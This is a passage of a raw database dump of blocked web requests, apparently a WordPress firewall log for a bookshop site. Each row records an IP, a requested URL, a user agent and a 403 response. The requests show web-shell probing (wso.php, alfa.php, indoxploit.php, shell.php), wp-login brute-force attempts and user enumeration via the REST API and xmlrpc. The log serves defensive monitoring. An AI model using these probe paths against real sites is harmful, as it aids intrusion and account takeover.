',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/system/error.php','','{\"1\":\"python-requests\\/2.25.0\"}','cq5uCjx9URg6nHMWGvPwLpsN',0,1636853293.6060,416,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/beez3/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','s07BY2JZPudVg5XLt3bS1koR',0,1636853295.3776,385,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/beez3/error.php','','{\"1\":\"python-requests\\/2.25.0\"}','hIVXUBlCRMOD0Er4Zju2zqcG',0,1636853296.8681,412,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/beez5/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','riUGbm0y5DaKeCqH4RsfLjAF',0,1636853298.5493,405,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/beez5/error.php','','{\"1\":\"python-requests\\/2.25.0\"}','nAyCdYfSZbL1uXaUvglBwI90',0,1636853300.0842,436,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/beez_20/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','OZXezt0nUpSsvN3qQCRl5MGW',0,1636853301.4880,409,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/beez_20/error.php','','{\"1\":\"python-requests\\/2.25.0\"}','SW621qHbi9pVQuzx07tPFnID',0,1636853303.1087,388,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/protostar/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','gs9QuXmC3zqfSxPjVoIkrWcR',0,1636853304.6241,127,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/protostar/error.php','','{\"1\":\"python-requests\\/2.25.0\"}','ZMur6efDY1L8JIEoc5bnVUqv',0,1636853305.8811,404,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/atomic/index.php','','{\"1\":\"python-requests\\/2.25.0\"}','ZQi5OVvA1uEMmJrh2o3qlYKD',0,1636853307.4827,414,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/templates/atomic/error.php','','{\"1\":\"python-requests\\/2.25.0\"}','H4GFhcxuNYa7lEZeIsMoJRCn',0,1636853309.1490,394,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/olux.php','','{\"1\":\"python-requests\\/2.25.0\"}','H5SF6moUMuyvBxeAp1GJnIql',0,1636853310.9495,421,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.25.0\"}','nrE2wvHQtOBjedSFCbMolyUf',0,1636853312.5409,738,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.25.0\"}','EFqPedftS1Vks3oX6cxbNGlI',0,1636853314.2655,383,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"python-requests\\/2.25.0\"}','0YD4UEtBpxro7QhTysIKdlJV',0,1636853315.7487,414,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/up.php','','{\"1\":\"python-requests\\/2.25.0\"}','m4g306KkHO2Rlo5j7dBhqTDi',0,1636853333.1338,426,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.25.0\"}','1ujxF4RMUV8o7EqQbKcAtXG2',0,1636853334.5335,404,'','GET',403,0,700,0,1,'',0),('20.114.47.166',343027622,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"python-requests\\/2.25.0\"}','czRLMi59fwDBskF6KoIxX8WA',0,1636853336.2657,469,'','GET',403,0,700,0,1,'',0),('13.52.107.99',221539171,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','zhB7CQ39yqo6DLPjFe8MvnOU',0,1636854179.2066,473,'','POST',403,0,600,0,1,'',0),('146.148.96.32',2459197472,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','JiRbcYewhPVlBxSsgMO4N2DL',0,1636855679.8751,494,'','POST',403,0,600,0,1,'',0),('95.216.208.32',1608044576,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','VTmfebRgHK7rx2q50DMuvlOy',0,1636857161.9570,625,'','POST',403,0,600,0,1,'',0),('178.73.217.204',2991184332,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','LPRmQgDeoxphCiu4sTVSBnMY',0,1636858725.4673,715,'','POST',403,0,600,0,1,'',0),('176.9.91.103',2953403239,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','g2X8Q5FZRJue1pjmvaPVUSiN',0,1636860330.9496,563,'','POST',403,0,600,0,1,'',0),('81.88.52.205',1364735181,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','ORoptBh753TGUnlybdrxHXci',0,1636861942.0676,487,'','POST',403,0,600,0,1,'',0),('82.202.172.247',1389014263,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','rWi43851sGYPUQekCmpvBK29',0,1636863545.0626,516,'','POST',403,0,600,0,1,'',0),('151.106.55.242',2540320754,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','rx34gozLEjTmsRWNYyeKaSpn',0,1636865474.6944,166,'','GET',403,0,520,0,1,'',0),('220.167.101.24',3701957912,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','38pRMsEhvOiHXyLUIdJl4Yoa',0,1636866750.3802,480,'','POST',403,0,600,0,1,'',0),('34.121.222.87',578412119,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Tt4REd3ryv9FHPsMnmWGYg2e',0,1636868351.2733,479,'','POST',403,0,600,0,1,'',0),('46.161.27.142',782310286,'','https://ashbooks.co.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','emTLask39wvKGIxgBXQzqiAn',0,1636869290.0921,429,'','GET',403,0,520,0,1,'',0),('46.161.27.142',782310286,'','https://ashbooks.co.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','7zIvi0ZmgqrT6AyQleSjJfG9',0,1636869290.6903,148,'','GET',403,0,520,0,1,'',0),('46.161.27.142',782310286,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','kvXabOuZ1pzhPBwWKiyfENoH',0,1636869291.0089,456,'','POST',403,0,600,0,1,'',0),('176.9.91.103',2953403239,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','CHpLgSXOPDys3IWbFh2AjoY4',0,1636869951.1128,605,'','POST',403,0,600,0,1,'',0),('193.36.118.233',3240392425,'','https://ashbooks.co.uk/?rest_route=/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','9VnaRDkYTUxOw7F82BKZXfbs',0,1636871128.0191,386,'','GET',403,0,520,0,1,'',0),('193.36.118.233',3240392425,'','https://ashbooks.co.uk/wp-json/wp/v2/users','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36 Edge\\/18.17763\"}','FCXZTaHA7wbM9P4y1ehgWVsv',0,1636871128.9444,159,'','GET',403,0,520,0,1,'',0),('193.36.118.233',3240392425,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','3hSdEPLs9BHRY2GTfb1yj0ei',0,1636871130.0130,416,'','POST',403,0,600,0,1,'',0),('51.75.15.189',860557245,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','eYcguQo5bBI1249nlONZTzX7',0,1636871587.8543,493,'','POST',403,0,600,0,1,'',0),('13.210.201.156',231917980,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','RqaBvoZ37nkYVJP6sXrltAFK',0,1636873347.1589,753,'','POST',403,0,600,0,1,'',0),('68.183.108.18',1152871442,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','DAZBGeqIC7OyP4ajcf9MVLXb',0,1636876745.9009,649,'','POST',403,0,600,0,1,'',0),('167.172.175.147',2813112211,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','Vb6wof7guGnPyvES8dWL594m',0,1636878351.8870,555,'','POST',403,0,600,0,1,'',0),('69.163.232.79',1168369743,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','PmsdaoTL3yf6xEU5wg7vHJGb',0,1636879921.0333,2003,'','POST',403,0,600,0,1,'',0),('46.160.121.111',782268783,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','MXx2CTgksGSOZPaJUBV1oqEv',0,1636881708.4064,477,'','POST',403,0,600,0,1,'',0),('39.100.228.235',660923627,'','https://ashbooks.co.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','F30aO8MpWVjvGd7RuyLQE5ZS',0,1636883021.3879,15583,'','POST',403,0,515,0,1,'',0),('167.172.153.166',2813106598,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','ExsGS1FhJjMIXOZUuif0vLT3',0,1636883763.7401,515,'','POST',403,0,600,0,1,'',0),('157.245.95.172',2650103724,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','dTsEHMI1AgLo0Cu29bVaFRhZ',0,1636885618.7298,496,'','POST',403,0,600,0,1,'',0),('185.2.4.68',3103917124,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\"}','K0qYFrhp4D63CyERTeGWuwns',0,1636889659.7159,854,'','POST',403,0,600,0,1,'',0),('89.109.14.213',1500319445,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','UXDJjVo04luKPyInpTAqLHgQ',0,1636891629.7559,2150,'','POST',403,0,600,0,1,'',0),('18.116.121.27',309623067,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','WqQkFPrJdg26ZfzUMp9hV1BY',0,1636893477.2996,3912,'','POST',403,0,600,0,1,'',0),('167.172.175.147',2813112211,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','v2BDexMbG1XI84tFuhZCogYj',0,1636896773.5254,513,'','POST',403,0,600,0,1,'',0),('46.101.26.42',778377770,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','vHo8pgf1byAiCDUYqrMJOlzw',0,1636897589.5366,514,'','POST',403,0,600,0,1,'',0),('46.101.26.42',778377770,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','MwEnbLmx2YCTUP4KfD05zrjH',0,1636898387.2817,1249,'','POST',403,0,600,0,1,'',0),('103.109.28.1',1735203841,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','P5yiGQxZ6wBAmzLb0IHDWsen',0,1636900057.1178,472,'','POST',403,0,600,0,1,'',0),('167.172.151.91',2813106011,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','PFcx9v3kAuLDytUZQ7IKRWnh',0,1636900772.3903,970,'','POST',403,0,600,0,1,'',0),('34.93.36.100',576529508,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','kRTJqzB2uLpNfvtQl35iDjMy',0,1636901461.7431,1959,'','POST',403,0,600,0,1,'',0),('104.198.1.26',1757806874,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','GJjsRCgKhBIzuUQfEXV43xbO',0,1636902181.5165,676,'','POST',403,0,600,0,1,'',0),('217.9.143.94',3641282398,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','FOdrJcbCZtjAuXVfGpE15D9w',0,1636903766.9481,931,'','POST',403,0,600,0,1,'',0),('148.72.214.245',2487801589,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','qVlDCOwnj6oLAvXEU3WkY24g',0,1636904570.0661,833,'','POST',403,0,600,0,1,'',0),('144.91.68.146',2421900434,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','3KzkTxujnUeilX9WcrfJFo1Q',0,1636905346.6623,538,'','POST',403,0,600,0,1,'',0),('139.59.115.136',2335929224,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','nGXRK3pBEWcJ5VjIQ982ZsAm',0,1636906216.2318,509,'','POST',403,0,600,0,1,'',0),('206.189.129.168',3468525992,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','iHpERkOmAhuYlUZq4ebMrgfj',0,1636907021.3255,739,'','POST',403,0,600,0,1,'',0),('206.189.139.182',3468528566,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','8fD2Wjmvs1QbeAMdUO5w9VHR',0,1636907838.4835,475,'','POST',403,0,600,0,1,'',0),('81.88.52.175',1364735151,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','X1a36DIwQqyME8ZGkpPcUzTf',0,1636908563.0054,448,'','POST',403,0,600,0,1,'',0),('107.180.73.192',1806977472,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','5oIFQnUwyxsf8NJzLlSEZHVt',0,1636909291.6748,488,'','POST',403,0,600,0,1,'',0),('20.106.180.170',342537386,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','F0jKdfcRn4SxMtkZr1zVqNOs',0,1636909530.4620,1801,'','GET',403,0,520,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','xjCzFlpUbhIuOydAorf4evn3',0,1636909980.3698,872,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4ILKH9rA1Qs28MF7OGf6R3hi',0,1636909984.1954,745,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','lJWEMISpXj1cn3qaigRPDUGr',0,1636909985.1437,426,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ovG7yXCS8ZMTDBckj60aVhQw',0,1636909985.7609,424,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','LfnGTXIqgcF6k0Y8HdjEuMWZ',0,1636909986.3623,674,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WuigehVdz9JEPOQfAxy3L04M',0,1636909987.2126,1022,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','odcM2i7L1xkGQYAhf8yp3CbD',0,1636909988.5193,391,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','x2z8pW5BPgIrA4b3doHO1aJZ',0,1636909989.0872,828,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','DlinCIQVFmroxHPRvG367swz',0,1636909990.0779,883,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Llnh3zXWbpgANHJT4tdIs5Fi',0,1636909991.1087,883,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','YwTjqyah9KRs7V6XOGt8CZd5',0,1636909992.6048,1026,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','0bjs8iXZHqTOYdvcINpa3f6n',0,1636909993.8616,954,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','JI6f0oZhtwRLTBNPFUY58i3y',0,1636909994.9910,740,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','nZG1wrpaYFIBDCs5Tze4Kghc',0,1636909995.9217,387,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9gJKftE0iO4peWXL5jzaFY2v',0,1636909996.7376,709,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/images/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','oxce6VFyRkPNultO84LEvfB5',0,1636909997.8198,523,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/dr.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','uyjkVp9S5ndD2aCGA6Y70mNf',0,1636909998.4853,945,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','90tpeFwo6KXUiPgLyORfBnhI',0,1636909999.5748,1108,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','ia045btve71kg8DcrCFQsM2n',0,1636910000.8893,746,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','dcTxigBoAS7jhNfKRPZVLs6G',0,1636910001.7692,545,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/data.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','32wMCnjh6SvrmpTzcWDGKIug',0,1636910002.5044,780,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/owl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','4lb79TcBGwNPmfUheCE8rjLq',0,1636910003.4396,2937,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/vuln.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iByjV0GF39eIQoScsDg48aJu',0,1636910006.5474,978,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','o6mVCZTzbF3DaNRLJi4GMxKf',0,1636910008.1669,1509,'','GET',403,0,700,0,1,'',0),('196.117.2.219',3296002779,'','https://ashbooks.co.uk/ohayo.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 